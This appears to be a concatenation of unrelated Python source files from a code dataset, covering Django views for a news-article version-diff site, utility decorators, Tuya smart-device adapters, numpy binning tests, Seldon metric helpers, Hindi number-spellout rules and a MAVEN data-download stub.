(64, 115), (64, 116), (64, 117), (64, 118), (64, 119), (64, 120), (64, 121), (64, 122), (64, 124), (65, 110), (65, 112), (65, 125), (66, 106), (66, 109), (66, 114), (66, 117), (66, 118), (66, 119), (66, 120), (66, 122), (66, 123), (66, 125), (67, 97), (67, 99), (67, 100), (67, 101), (67, 102), (67, 103), (67, 104), (67, 105), (67, 107), (67, 110), (67, 111), (67, 112), (67, 113), (67, 114), (67, 115), (67, 116), (67, 121), (67, 124), (67, 125), (68, 96), (68, 106), (68, 109), (68, 110), (68, 111), (68, 112), (68, 114), (68, 117), (68, 118), (68, 120), (68, 125), (69, 95), (69, 99), (69, 100), (69, 102), (69, 103), (69, 104), (69, 105), (69, 106), (69, 107), (69, 108), (69, 109), (69, 110), (69, 111), (69, 112), (69, 114), (70, 94), (70, 97), (70, 101), (70, 103), (70, 104),
(70, 105), (70, 106), (70, 107), (70, 108), (70, 109), (70, 110), (70, 111), (70, 112), (70, 113), (70, 114), (71, 92), (71, 96), (71, 102), (71, 104), (71, 105), (71, 106), (71, 107), (71, 108), (71, 109), (71, 110), (71, 111), (71, 113), (72, 95), (72, 102), (72, 104), (72, 105), (72, 106), (72, 107), (72, 108), (72, 109), (72, 110), (72, 111), (72, 113), (73, 91), (73, 93), (73, 95), (73, 102), (73, 104), (73, 105), (73, 106), (73, 107), (73, 108), (73, 109), (73, 110), (73, 111), (73, 113), (73, 114), (73, 118), (73, 119), (74, 86), (74, 87), (74, 91), (74, 93), (74, 94), (74, 96), (74, 102), (74, 104), (74, 105), (74, 106), (74, 107), (74, 108), (74, 109), (74, 110), (74, 111), (74, 112), (74, 113), (74, 114), (74, 117), (74, 120), (75, 85), (75, 88), (75, 91),
(75, 93), (75, 94), (75, 95), (75, 97), (75, 102), (75, 104), (75, 105), (75, 106), (75, 107), (75, 108), (75, 109), (75, 110), (75, 111), (75, 112), (75, 113), (75, 114), (75, 115), (75, 118), (75, 120), (76, 84), (76, 86), (76, 87), (76, 89), (76, 90), (76, 91), (76, 92), (76, 93), (76, 94), (76, 95), (76, 97), (76, 102), (76, 104), (76, 105), (76, 106), (76, 107), (76, 108), (76, 109), (76, 110), (76, 111), (76, 112), (76, 113), (76, 114), (76, 117), (76, 118), (76, 119), (76, 121), (77, 83), (77, 85), (77, 86), (77, 87), (77, 88), (77, 91), (77, 92), (77, 93), (77, 94), (77, 95), (77, 96), (77, 98), (77, 103), (77, 106), (77, 107), (77, 108), (77, 109), (77, 110), (77, 111), (77, 112), (77, 113), (77, 114), (77, 115), (77, 116), (77, 117), (77, 118),
(77, 119), (77, 121), (78, 83), (78, 85), (78, 86), (78, 87), (78, 88), (78, 89), (78, 90), (78, 91), (78, 92), (78, 93), (78, 94), (78, 95), (78, 98), (78, 104), (78, 107), (78, 108), (78, 109), (78, 110), (78, 111), (78, 112), (78, 113), (78, 114), (78, 115), (78, 116), (78, 117), (78, 118), (78, 119), (78, 120), (78, 121), (78, 122), (79, 82), (79, 84), (79, 85), (79, 86), (79, 87), (79, 88), (79, 89), (79, 90), (79, 91), (79, 92), (79, 93), (79, 97), (79, 106), (79, 108), (79, 109), (79, 110), (79, 111), (79, 112), (79, 113), (79, 114), (79, 115), (79, 116), (79, 117), (79, 118), (79, 119), (79, 120), (79, 122), (80, 81), (80, 83), (80, 84), (80, 85), (80, 86), (80, 87), (80, 88), (80, 89), (80, 90), (80, 91), (80, 94), (80, 95), (80, 107),
(80, 109), (80, 110), (80, 111), (80, 112), (80, 113), (80, 114), (80, 115), (80, 116), (80, 117), (80, 118), (80, 119), (80, 121), (81, 81), (81, 93), (81, 108), (81, 110), (81, 111), (81, 112), (81, 113), (81, 114), (81, 115), (81, 116), (81, 117), (81, 118), (81, 119), (81, 121), (82, 81), (82, 84), (82, 85), (82, 86), (82, 87), (82, 88), (82, 89), (82, 90), (82, 108), (82, 110), (82, 111), (82, 112), (82, 113), (82, 114), (82, 115), (82, 116), (82, 117), (82, 118), (82, 120), (83, 80), (83, 82), (83, 101), (83, 103), (83, 108), (83, 110), (83, 111), (83, 112), (83, 113), (83, 114), (83, 115), (83, 116), (83, 117), (83, 119), (84, 80), (84, 82), (84, 105), (84, 108), (84, 109), (84, 110), (84, 111), (84, 112), (84, 113), (84, 114), (84, 115), (84, 116), (84, 117),
(84, 119), (85, 80), (85, 82), (85, 100), (85, 102), (85, 103), (85, 106), (85, 108), (85, 109), (85, 110), (85, 111), (85, 112), (85, 113), (85, 114), (85, 115), (85, 116), (85, 118), (86, 80), (86, 82), (86, 93), (86, 99), (86, 101), (86, 102), (86, 103), (86, 104), (86, 105), (86, 108), (86, 109), (86, 110), (86, 111), (86, 112), (86, 113), (86, 114), (86, 115), (86, 117), (87, 80), (87, 83), (87, 88), (87, 89), (87, 90), (87, 91), (87, 93), (87, 99), (87, 101), (87, 102), (87, 103), (87, 104), (87, 105), (87, 106), (87, 107), (87, 108), (87, 109), (87, 110), (87, 111), (87, 112), (87, 113), (87, 114), (87, 116), (88, 81), (88, 83), (88, 84), (88, 85), (88, 86), (88, 90), (88, 93), (88, 99), (88, 102), (88, 103), (88, 104), (88, 105), (88, 106), (88, 107),
(88, 108), (88, 109), (88, 110), (88, 111), (88, 112), (88, 113), (88, 115), (89, 94), (89, 101), (89, 114), (90, 94), (90, 102), (90, 103), (90, 104), (90, 105), (90, 106), (90, 107), (90, 108), (90, 109), (90, 110), (90, 111), (90, 113), (91, 94), (92, 94), (93, 94), (94, 94), (95, 93), (96, 92), (96, 93), (97, 93), (98, 92), (98, 93), )
coordinates_6395ED = ((127, 124),
(128, 123), (128, 124), (129, 123), (129, 125), (130, 123), (130, 126), (131, 123), (131, 126), (132, 122), (132, 124), (132, 125), (132, 127), (133, 122), (133, 124), (133, 125), (133, 127), (134, 122), (134, 124), (134, 125), (134, 126), (134, 127), (135, 123), (135, 125), (135, 126), (135, 128), (136, 124), (136, 126), (136, 128), (137, 124), (137, 126), (137, 128), (138, 124), (138, 126), (138, 128), (139, 125), (139, 128), (140, 125), (140, 128), (141, 125), (141, 128), (142, 125), (142, 127), (143, 125), (143, 127), (144, 125), (144, 127), (145, 125), (145, 126), )
coordinates_00FFFE = ((145, 142),
(146, 140), (146, 142), (147, 137), (147, 143), (148, 136), (148, 139), (148, 140), (148, 141), (148, 142), (148, 144), (149, 135), (149, 137), (149, 142), (149, 144), (150, 134), (150, 136), (150, 142), (150, 144), (151, 133), (151, 135), (151, 141), (151, 144), (152, 131), (152, 133), (152, 140), (152, 142), (152, 144), (153, 139), (153, 141), (153, 142), (153, 144), (154, 139), (154, 141), (154, 145), (155, 138), (155, 143), (155, 145), (156, 138), (156, 140), (156, 141), (156, 144), (156, 146), (157, 145), (158, 146), (158, 147), (159, 146), (159, 147), (160, 145), (160, 148), (161, 143), (161, 146), (161, 148), (162, 141), (162, 145), (162, 146), (162, 148), (163, 143), (163, 147), (164, 144), (164, 146), )
coordinates_B4E7FA = ((120, 146),
(120, 148), (120, 149), (120, 150), (121, 146), (121, 153), (122, 147), (122, 149), (122, 150), (122, 151), (122, 153), (123, 148), (123, 150), (123, 151), (123, 153), (124, 148), (124, 150), (124, 151), (124, 153), (125, 147), (125, 153), (126, 146), (126, 148), (126, 149), (126, 150), (126, 152), )
coordinates_F98072 = ((129, 121),
(130, 120), (130, 121), (131, 118), (131, 120), (132, 117), (132, 120), (133, 117), (133, 120), (134, 117), (134, 119), (135, 119), (136, 118), (137, 119), (137, 120), (138, 119), (138, 120), (139, 120), (140, 120), (141, 120), (142, 120), (143, 119), (143, 120), (144, 119), (145, 118), (146, 117), (146, 118), (147, 117), )
coordinates_97FB98 = ((154, 118),
(155, 118), (155, 119), (156, 118), (157, 119), (157, 120), (158, 119), (158, 121), (159, 120), (159, 121), (160, 121), (160, 122), (161, 121), (161, 124), (161, 126), (162, 121), (162, 127), (162, 133), (163, 121), (163, 123), (163, 124), (163, 125), (163, 126), (163, 128), (163, 133), (163, 136), (164, 121), (164, 122), (164, 128), (164, 133), (164, 137), (165, 129), (165, 133), (165, 135), (165, 138), (165, 141), (165, 143), (166, 129), (166, 134), (166, 136), (166, 140), (166, 143), (166, 145), (167, 129), (167, 134), (167, 136), (167, 137), (167, 138), (167, 140), (167, 143), (167, 145), (168, 129), (168, 135), (168, 145), (169, 128), (169, 129), (169, 136), (169, 138), (169, 139), (169, 140), (169, 141), (169, 142), (169, 143), (169, 145), (170, 128), (171, 128), (172, 128), (172, 133), (173, 128), (173, 132), (173, 133), (174, 128), (174, 132),
(175, 128), (175, 131), (176, 128), (176, 131), (177, 128), (177, 130), (178, 130), )
coordinates_323287 = ((154, 111),
(154, 113), (154, 114), (154, 115), (154, 116), (155, 101), (155, 114), (156, 104), (156, 110), (156, 112), (157, 102), (157, 106), (157, 109), (157, 111), (158, 103), (158, 111), (159, 104), (159, 107), (159, 109), (159, 111), (160, 105), (160, 110), (161, 107), (161, 109), )
coordinates_6495ED = ((100, 126),
(100, 127), (101, 126), (101, 128), (102, 126), (102, 128), (103, 126), (103, 128), (104, 126), (104, 129), (105, 125), (105, 128), (106, 125), (106, 126), (106, 128), (107, 125), (107, 128), (108, 125), (108, 128), (109, 125), (109, 128), (110, 125), (110, 127), (111, 125), (111, 127), (112, 125), (112, 126), (113, 126), (114, 126), (115, 125), (116, 124), (117, 124), )
coordinates_01FFFF = ((79, 153),
(80, 149), (80, 150), (80, 153), (81, 148), (81, 152), (82, 146), (82, 149), (82, 150), (82, 152), (83, 145), (83, 147), (83, 148), (83, 149), (83, 150), (83, 152), (84, 144), (84, 149), (84, 151), (85, 142), (85, 148), (85, 151), (86, 140), (86, 147), (86, 150), (87, 138), (87, 146), (87, 148), (87, 150), (88, 145), (88, 147), (88, 149), (89, 144), (89, 146), (89, 147), (89, 149), (90, 143), (90, 145), (90, 146), (90, 148), (91, 142), (91, 147), (92, 141), (92, 143), (92, 144), (92, 145), (92, 147), (93, 140), (93, 142), (93, 143), (94, 134), (94, 140), (94, 143), (95, 135), (95, 136), (95, 140), (95, 143), (96, 135), (96, 137), (96, 138), (96, 139), (96, 140), (96, 141), (96, 142), (96, 144), (97, 136), (97, 139), (97, 140), (97, 141), (97, 142), (97, 143), (98, 136), (98, 139),
(98, 140), (98, 141), (98, 143), (99, 138), (99, 143), (100, 140), (100, 142), )
|
py | 7df7bd4b2f0855e907e03b59b0c0028033614074 | from app import app
if __name__ == '__main__':
app.run(debug=True) |
py | 7df7be0857a9ed6a689fb54be35df5986294fb4f |
import functools
import os.path
from decorator import decorator
from django import http
from django.conf import settings as dsettings
from django.forms.utils import ErrorDict
from django.shortcuts import render
from common.jsonify import json_dumps
def render_to_json(f): # pragma: no cover
"""
Decorator to be applied to a view to serialize json in the result.
"""
@functools.wraps(f)
def wrapper(func, *args, **kw):
if dsettings.DEBUG:
ct = 'text/plain'
j = lambda d: json_dumps(d, indent=2)
else:
ct = 'application/json'
j = json_dumps
try:
result = func(*args, **kw)
except Exception as e:
result = j(str(e))
status = 500
else:
if isinstance(result, http.HttpResponse):
return result
else:
                # Decide the status before serializing; once json-encoded the result is a
                # plain string, so the ErrorDict check would otherwise never match.
                status = 200 if not isinstance(result, ErrorDict) else 400
                result = j(result)
        return http.HttpResponse(content=result, content_type=ct, status=status)
return decorator(wrapper, f)
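# A minimal usage sketch, not part of the original module; the view name and payload
# below are hypothetical. A decorated view just returns a serializable value and the
# decorator handles the content type, pretty-printing under DEBUG, and error statuses.
#
# @render_to_json
# def api_status(request):
#     return {'ok': True, 'version': 1}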
# see: http://www.djangosnippets.org/snippets/821/
def render_to_template(template): # pragma: no cover
"""
    Decorator for Django views that passes the returned dict to Django's render()
    with the given template, using the request to build the context.
    If the view doesn't return a dict, the decorator simply returns its output.
    Additionally, the view can return a two-tuple whose first element is the context
    dict and whose second element is a template name; that name overrides the
    template given as a parameter. A commented usage sketch follows the decorator.
Parameters:
- template: template name to use
"""
def renderer(func):
@functools.wraps(func)
def wrapper(request, *args, **kw):
output = func(request, *args, **kw)
if isinstance(output, (list, tuple)):
output, tpl = output
else:
tpl = template
ct = 'text/html'
if tpl.endswith('xml'):
ct = 'text/xml' if dsettings.DEBUG else 'application/xml'
if isinstance(output, dict):
if request.is_ajax():
tpl = ('%s_body%s' % os.path.splitext(tpl), tpl)
return render(request, tpl, output, content_type=ct)
else:
return output
return wrapper
return renderer
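# Illustrative only; the view, model, and template names are made up. Returning a dict
# renders the template passed to the decorator, while returning (dict, 'other.html')
# overrides the template for that response.
#
# @render_to_template('talks/list.html')
# def talk_list(request):
#     talks = Talk.objects.all()
#     if not talks:
#         return {'talks': []}, 'talks/empty.html'
#     return {'talks': talks}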
|
py | 7df7be6d3f42fd56e2878441cec2c130b9d34e58 | import datetime
import re
from django.shortcuts import render_to_response, get_object_or_404, redirect
from models import Article, Version
import models
import json
from django.http import HttpResponse, HttpResponseRedirect, Http404
from django.core.urlresolvers import reverse
import urllib
import django.db
import time
from django.template import Context, RequestContext, loader
from django.views.decorators.cache import cache_page
OUT_FORMAT = '%B %d, %Y at %l:%M%P EDT'
SEARCH_ENGINES = """
http://www.ask.com
http://www.google
https://www.google
search.yahoo.com
http://www.bing.com
""".split()
def came_from_search_engine(request):
return any(x in request.META.get('HTTP_REFERER', '')
for x in SEARCH_ENGINES)
def Http400():
t = loader.get_template('404.html')
return HttpResponse(t.render(Context()), status=400)
def get_first_update(source):
if source is None:
source = ''
updates = models.Article.objects.order_by('last_update').filter(last_update__gt=datetime.datetime(1990, 1, 1, 0, 0),
url__contains=source)
try:
return updates[0].last_update
except IndexError:
return datetime.datetime.now()
def get_last_update(source):
if source is None:
source = ''
updates = models.Article.objects.order_by('-last_update').filter(last_update__gt=datetime.datetime(1990, 1, 1, 0, 0), url__contains=source)
try:
return updates[0].last_update
except IndexError:
return datetime.datetime.now()
def get_articles(source=None, distance=0):
articles = []
rx = re.compile(r'^https?://(?:[^/]*\.)%s/' % source if source else '')
pagelength = datetime.timedelta(days=1)
end_date = datetime.datetime.now() - distance * pagelength
start_date = end_date - pagelength
print 'Asking query'
    # Raw SQL: pull every non-boring version (joined with its article) for articles
    # whose most recent non-boring version falls inside the requested one-day window
    # and which have more than one non-boring version.
    version_query = '''SELECT
version.id, version.article_id, version.v, version.title,
version.byline, version.date, version.boring, version.diff_json,
T.age as age,
Articles.url as a_url, Articles.initial_date as a_initial_date,
Articles.last_update as a_last_update, Articles.last_check as a_last_check
FROM version,
(SELECT Articles.id as article_id, MAX(T3.date) AS age, COUNT(T3.id) AS num_vs
FROM Articles LEFT OUTER JOIN version T3 ON (Articles.id = T3.article_id)
WHERE (T3.boring=0) GROUP BY Articles.id
HAVING (age > %s AND age < %s AND num_vs > 1 )) T, Articles
WHERE (version.article_id = Articles.id) and
(version.article_id = T.article_id) and
NOT version.boring
ORDER BY date'''
all_versions = models.Version.objects.raw(version_query,
(start_date, end_date))
article_dict = {}
for v in all_versions:
a=models.Article(id=v.article_id,
url=v.a_url, initial_date=v.a_initial_date,
last_update=v.a_last_update, last_check=v.a_last_check)
v.article = a
article_dict.setdefault(v.article, []).append(v)
for article, versions in article_dict.items():
url = article.url
if not rx.match(url):
print 'REJECTING', url
continue
if 'blogs.nytimes.com' in url: #XXX temporary
continue
if len(versions) < 2:
continue
rowinfo = get_rowinfo(article, versions)
articles.append((article, versions[-1], rowinfo))
print 'Queries:', len(django.db.connection.queries), django.db.connection.queries
articles.sort(key = lambda x: x[-1][0][1].date, reverse=True)
return articles
SOURCES = '''nytimes.com cnn.com politico.com washingtonpost.com
bbc.co.uk'''.split()
@cache_page(60 * 30) #30 minute cache
def browse(request, source=''):
if source not in SOURCES + ['']:
raise Http404
pagestr=request.REQUEST.get('page', '1')
try:
page = int(pagestr)
except ValueError:
page = 1
first_update = get_first_update(source)
num_pages = (datetime.datetime.now() - first_update).days + 1
page_list=range(1, 1+num_pages)
articles = get_articles(source=source, distance=page-1)
return render_to_response('browse.html', {
'source': source, 'articles': articles,
'page':page,
'page_list': page_list,
'first_update': first_update,
'sources': SOURCES
})
@cache_page(60 * 30) #30 minute cache
def feed(request, source=''):
if source not in SOURCES + ['']:
raise Http404
pagestr=request.REQUEST.get('page', '1')
try:
page = int(pagestr)
except ValueError:
page = 1
first_update = get_first_update(source)
last_update = get_last_update(source)
num_pages = (datetime.datetime.now() - first_update).days + 1
page_list=range(1, 1+num_pages)
articles = get_articles(source=source, distance=page-1)
return render_to_response('feed.xml', {
'source': source, 'articles': articles,
'page':page,
'request':request,
'page_list': page_list,
'last_update': last_update,
'sources': SOURCES
},
context_instance=RequestContext(request),
mimetype='application/atom+xml')
def old_diffview(request):
"""Support for legacy diff urls"""
url = request.REQUEST.get('url')
v1tag = request.REQUEST.get('v1')
v2tag = request.REQUEST.get('v2')
if url is None or v1tag is None or v2tag is None:
return HttpResponseRedirect(reverse(front))
try:
v1 = Version.objects.get(v=v1tag)
v2 = Version.objects.get(v=v2tag)
except Version.DoesNotExist:
return Http400()
try:
article = Article.objects.get(url=url)
except Article.DoesNotExist:
return Http400()
return redirect(reverse('diffview', kwargs=dict(vid1=v1.id,
vid2=v2.id,
urlarg=article.filename())),
permanent=True)
def diffview(request, vid1, vid2, urlarg):
# urlarg is unused, and only for readability
# Could be strict and enforce urlarg == article.filename()
try:
v1 = Version.objects.get(id=int(vid1))
v2 = Version.objects.get(id=int(vid2))
except Version.DoesNotExist:
raise Http404
article = v1.article
if v1.article != v2.article:
raise Http404
title = article.latest_version().title
versions = dict(enumerate(article.versions()))
adjacent_versions = []
dates = []
texts = []
for v in (v1, v2):
texts.append(v.text())
dates.append(v.date.strftime(OUT_FORMAT))
indices = [i for i, x in versions.items() if x == v]
if not indices:
#One of these versions doesn't exist / is boring
return Http400()
index = indices[0]
adjacent_versions.append([versions.get(index+offset)
for offset in (-1, 1)])
if any(x is None for x in texts):
return Http400()
links = []
for i in range(2):
if all(x[i] for x in adjacent_versions):
diffl = reverse('diffview', kwargs=dict(vid1=adjacent_versions[0][i].id,
vid2=adjacent_versions[1][i].id,
urlarg=article.filename()))
links.append(diffl)
else:
links.append('')
return render_to_response('diffview.html', {
'title': title,
'date1':dates[0], 'date2':dates[1],
'text1':texts[0], 'text2':texts[1],
'prev':links[0], 'next':links[1],
'article_shorturl': article.filename(),
'article_url': article.url, 'v1': v1, 'v2': v2,
'display_search_banner': came_from_search_engine(request),
})
def get_rowinfo(article, version_lst=None):
if version_lst is None:
version_lst = article.versions()
rowinfo = []
lastv = None
urlarg = article.filename()
for version in version_lst:
date = version.date
if lastv is None:
diffl = ''
else:
diffl = reverse('diffview', kwargs=dict(vid1=lastv.id,
vid2=version.id,
urlarg=urlarg))
rowinfo.append((diffl, version))
lastv = version
rowinfo.reverse()
return rowinfo
def prepend_http(url):
"""Return a version of the url that starts with the proper scheme.
url may look like
www.nytimes.com
https:/www.nytimes.com <- because double slashes get stripped
http://www.nytimes.com
"""
components = url.split('/', 2)
if len(components) < 2 or '.' in components[0]:
components = ['http:', '']+components
elif components[1]:
components[1:1] = ['']
return '/'.join(components)
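# A few worked examples of the normalization above (outputs follow directly from the
# splitting logic):
#   prepend_http('www.nytimes.com')         -> 'http://www.nytimes.com'
#   prepend_http('https:/www.nytimes.com')  -> 'https://www.nytimes.com'
#   prepend_http('http://www.nytimes.com')  -> 'http://www.nytimes.com'
#   prepend_http('www.nytimes.com/pages/')  -> 'http://www.nytimes.com/pages/'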
def article_history(request, urlarg=''):
url = request.REQUEST.get('url') # this is the deprecated interface.
if url is None:
url = urlarg
if len(url) == 0:
return HttpResponseRedirect(reverse(front))
url = url.split('?')[0] #For if user copy-pastes from news site
url = prepend_http(url)
try:
article = Article.objects.get(url=url)
except Article.DoesNotExist:
return render_to_response('article_history_missing.html', {'url': url})
if len(urlarg) == 0:
return HttpResponseRedirect(reverse(article_history, args=[article.filename()]))
rowinfo = get_rowinfo(article)
return render_to_response('article_history.html', {'article':article,
'versions':rowinfo,
'display_search_banner': came_from_search_engine(request),
})
def article_history_feed(request, url=''):
url = prepend_http(url)
article = get_object_or_404(Article, url=url)
rowinfo = get_rowinfo(article)
return render_to_response('article_history.xml',
{ 'article': article,
'versions': rowinfo,
'request': request,
},
context_instance=RequestContext(request),
mimetype='application/atom+xml')
def json_view(request, vid):
version = get_object_or_404(Version, id=int(vid))
data = dict(
title=version.title,
byline = version.byline,
date = version.date.isoformat(),
text = version.text(),
)
return HttpResponse(json.dumps(data), mimetype="application/json")
def upvote(request):
article_url = request.REQUEST.get('article_url')
diff_v1 = request.REQUEST.get('diff_v1')
diff_v2 = request.REQUEST.get('diff_v2')
remote_ip = request.META.get('REMOTE_ADDR')
article_id = Article.objects.get(url=article_url).id
models.Upvote(article_id=article_id, diff_v1=diff_v1, diff_v2=diff_v2, creation_time=datetime.datetime.now(), upvoter_ip=remote_ip).save()
return render_to_response('upvote.html')
def about(request):
return render_to_response('about.html', {})
def examples(request):
return render_to_response('examples.html', {})
def contact(request):
return render_to_response('contact.html', {})
def front(request):
return render_to_response('front.html', {'sources': SOURCES})
def subscribe(request):
return render_to_response('subscribe.html', {})
def press(request):
return render_to_response('press.html', {})
|
py | 7df7bedab41ab8d24688e577f867ab52703a7d05 | from adapters.on_off_switch_adapter import OnOffSwitchAdapter
from adapters.generic.blind_adapter import BlindAdapter
from adapters.generic.plug import PlugAdapter
from adapters.generic.temp_hum_sensor import TemperatureHumiditySensorAdapter
from adapters.tuya.TS0002 import TS0002
from adapters.tuya.TS0012 import TS0012
from adapters.tuya.TS0013 import TS0013
from adapters.tuya.TS0015 import TS0015
from adapters.tuya.TS0041 import TS0041
from adapters.tuya.TS0601 import TS0601
tuya_adapters = {
'TS0121': OnOffSwitchAdapter, # TuYa 10A UK or 16A EU smart plug
'TS0121_plug': PlugAdapter, # TuYa 10A UK or 16A EU smart plug
'TS0121_switch': OnOffSwitchAdapter, # TuYa Smart light switch module (1 gang)
'TS0201': TemperatureHumiditySensorAdapter, # TuYa Temperature & humidity sensor with display
'TS0002': TS0002, # TuYa 2 gang switch
'TS0011': OnOffSwitchAdapter, # TuYa Smart light switch - 1 gang without neutral wire
'TS0012': TS0012, # TuYa Smart light switch - 2 gang without neutral wire
'TS0013': TS0013, # TuYa Smart light switch - 3 gang without neutral wire
'TS0015': TS0015, # TuYa Multiprise with 4 AC outlets and 2 USB super charging ports (10A or 16A)
'TS0041': TS0041, # TuYa Wireless switch with 1 button
'TS0601_curtain': BlindAdapter, # TuYa Curtain motor
'TS0601_thermostat': TS0601, # TuYa Radiator valve with thermostat
'mcdj3aq': BlindAdapter, # TuYa Tubular motor
'TS130F': BlindAdapter, # TuYa Curtain / Blind switch
}
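# Lookup sketch (illustrative, not part of the original module):
#   tuya_adapters['TS0013']         -> TS0013 adapter class (3 gang switch, no neutral)
#   tuya_adapters['TS0601_curtain'] -> generic BlindAdapter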
|
py | 7df7bf65748a15da15f95fd5eb9871ce8723e6bf | from __future__ import absolute_import, division, print_function
import numpy as np
import pytest
from numpy.testing import assert_array_equal
from .. import binning
@pytest.mark.parametrize(
('centers', 'ref'),
    [(np.arange(10, 20, dtype=float), np.arange(9.5, 20)),
(2.0 ** np.arange(1, 10), [1, 3, 6, 12, 24, 48, 96, 192, 384, 640])])
def test_calculate_bin_edges(centers, ref):
"""Test bin edges calculated for an evenly and an unevenly spaced
set of centers.
"""
assert_array_equal(binning.calculate_bin_edges(centers), ref)
@pytest.mark.parametrize(
('edges', 'widths', 'centers'),
[([1, 2, 4, 10, 20], [1, 2, 6, 10], [1.5, 2.5, 5.5, 14.5]),
([1, 2], [1], [1.5])])
def test_calculate_bins(edges, widths, centers):
"""Test a normal case and an edge case with only one bin."""
assert_array_equal(binning.calculate_bin_widths(edges), widths)
assert_array_equal(binning.calculate_bin_centers(edges), centers)
def test_center_edge_center_roundtrip():
"""
Test that we can start with centers and roundtrip to the same centers.
"""
centers = [1, 2, 4, 10, 20]
calc_edges = binning.calculate_bin_edges(centers)
calc_centers = binning.calculate_bin_centers(calc_edges)
assert_array_equal(calc_centers, centers)
@pytest.mark.parametrize('a', [np.arange(20).reshape((4, 5)), np.array([5])])
def test_calculate_bin_raises(a):
"""Test we get a ValueError with a non-1D or scalar array."""
with pytest.raises(ValueError):
binning.calculate_bin_edges(a)
with pytest.raises(ValueError):
binning.calculate_bin_widths(a)
with pytest.raises(ValueError):
binning.calculate_bin_centers(a)
|
py | 7df7bff03cb9bc10f5d99493abfc615e49d7215c | # -*- coding: utf-8 -*-
info = {
"%spellout-cardinal": {
"0": "शून्य;",
"1": "एक;",
"2": "दो;",
"3": "तीन;",
"4": "चार;",
"5": "पाँच;",
"6": "छह;",
"7": "सात;",
"8": "आठ;",
"9": "नौ;",
"10": "दस;",
"11": "ग्यारह;",
"12": "बारह;",
"13": "तेरह;",
"14": "चौदह;",
"15": "पन्द्रह;",
"16": "सोलह;",
"17": "सत्रह;",
"18": "अठारह;",
"19": "उन्नीस;",
"20": "बीस;",
"21": "इक्कीस;",
"22": "बाईस;",
"23": "तेईस;",
"24": "चौबीस;",
"25": "पच्चीस;",
"26": "छब्बीस;",
"27": "सत्ताईस;",
"28": "अट्ठाईस;",
"29": "उनतीस;",
"30": "तीस;",
"31": "इकतीस;",
"32": "बत्तीस;",
"33": "तैंतीस;",
"34": "चौंतीस;",
"35": "पैंतीस;",
"36": "छत्तीस;",
"37": "सैंतीस;",
"38": "अड़तीस;",
"39": "उनतालीस;",
"40": "चालीस;",
"41": "इकतालीस;",
"42": "बयालीस;",
"43": "तैंतालीस;",
"44": "चौवालीस;",
"45": "पैंतालीस;",
"46": "छियालीस;",
"47": "सैंतालीस;",
"48": "अड़तालीस;",
"49": "उनचास;",
"50": "पचास;",
"51": "इक्यावन;",
"52": "बावन;",
"53": "तिरेपन;",
"54": "चौवन;",
"55": "पचपन;",
"56": "छप्पन;",
"57": "सत्तावन;",
"58": "अट्ठावन;",
"59": "उनसठ;",
"60": "साठ;",
"61": "इकसठ;",
"62": "बासठ;",
"63": "तिरेसठ;",
"64": "चौंसठ;",
"65": "पैंसठ;",
"66": "छियासठ;",
"67": "सड़सठ;",
"68": "अड़सठ;",
"69": "उनहत्तर;",
"70": "सत्तर;",
"71": "इकहत्तर;",
"72": "बहत्तर;",
"73": "तिहत्तर;",
"74": "चौहत्तर;",
"75": "पचहत्तर;",
"76": "छिहत्तर;",
"77": "सतहत्तर;",
"78": "अठहत्तर;",
"79": "उनासी;",
"80": "अस्सी;",
"81": "इक्यासी;",
"82": "बयासी;",
"83": "तिरासी;",
"84": "चौरासी;",
"85": "पचासी;",
"86": "छियासी;",
"87": "सत्तासी;",
"88": "अट्ठासी;",
"89": "नवासी;",
"90": "नब्बे;",
"91": "इक्यानबे;",
"92": "बानबे;",
"93": "तिरानबे;",
"94": "चौरानबे;",
"95": "पंचानबे;",
"96": "छियानबे;",
"97": "सत्तानबे;",
"98": "अट्ठानबे;",
"99": "निन्यानबे;",
"(100, 999)": "<< सौ[ >>];",
"(1000, 99999)": "<< हज़ार[ >>];",
"(100000, 9999999)": "<< लाख[ >>];",
"(10000000, 999999999)": "<< करोड़[ >>];",
"(1000000000, 99999999999)": "<< अरब[ >>];",
"(100000000000, 999999999999999999)": "<< खरब[ >>];",
"(1000000000000000000, 'inf')": "=#,##,##0=;"
},
"%spellout-numbering": {
"(0, 'inf')": "=%spellout-cardinal=;"
},
"%spellout-numbering-year": {
"(0, 'inf')": "=%spellout-numbering=;"
},
"%spellout-ordinal-feminine": {
"0": "शून्यवी;",
"1": "पहली;",
"2": "दूसरी;",
"3": "तीसरी;",
"4": "चौथी;",
"5": "पाँचवी;",
"6": "छठी;",
"(7, 'inf')": "=%spellout-cardinal=वी;"
},
"%spellout-ordinal-masculine": {
"0": "शून्यवाँ;",
"1": "पहला;",
"2": "दूसरा;",
"3": "तीसरा;",
"4": "चौथा;",
"5": "पाँचवाँ;",
"6": "छठा;",
"(7, 'inf')": "=%spellout-cardinal=वाँ;"
}
} |
py | 7df7c0b736859f61815c91debd1f1d506837e0a0 | from django.db.models import EmailField
from zoogle.core.models import BaseModel
class Zmail(BaseModel):
from_addr = EmailField()
to_addr = EmailField()
|
py | 7df7c1a68c5e7560c0dc86b29340240c35083cb6 | from microservice import SeldonMicroserviceException
import json
COUNTER = "COUNTER"
GAUGE = "GAUGE"
TIMER = "TIMER"
def create_counter(key, value):
    # Adding 1 raises a TypeError up front if value is not numeric,
    # mirroring the check performed later in validate_metrics.
    test = value + 1
    return {"key": key, "type": COUNTER, "value": value}
def create_gauge(key, value):
    # Same early numeric check as create_counter.
    test = value + 1
    return {"key": key, "type": GAUGE, "value": value}
def create_timer(key, value):
    # Same early numeric check as create_counter.
    test = value + 1
    return {"key": key, "type": TIMER, "value": value}
def validate_metrics(metrics):
if isinstance(metrics, (list,)):
for metric in metrics:
if not ("key" in metric and "value" in metric and "type" in metric):
return False
if not (metric["type"] == COUNTER or metric["type"] == GAUGE or metric["type"] == TIMER):
return False
try:
metric["value"] + 1
except TypeError:
return False
else:
return False
return True
def get_custom_metrics(component):
if hasattr(component,"metrics"):
metrics = component.metrics()
if not validate_metrics(metrics):
jStr = json.dumps(metrics)
raise SeldonMicroserviceException("Bad metric created during request: "+jStr,reason="MICROSERVICE_BAD_METRIC")
return metrics
else:
return None
|
py | 7df7c1a95d22d2d7c095be243708fbc5ab133dde | # -*- coding: utf-8 -*-
"""
File:
download_file_utilities.py
Description:
Functions used by maven_load.
"""
uname = ''
pword = ''
from .utilities import l2_regex, kp_regex
def get_filenames(query, public):
    import urllib.request
public_url = 'https://lasp.colorado.edu/maven/sdc/public/files/api/v1/search/science/fn_metadata/file_names' + \
'?' + query
private_url = 'https://lasp.colorado.edu/maven/sdc/service/files/api/v1/search/science/fn_metadata/file_names' + \
'?' + query
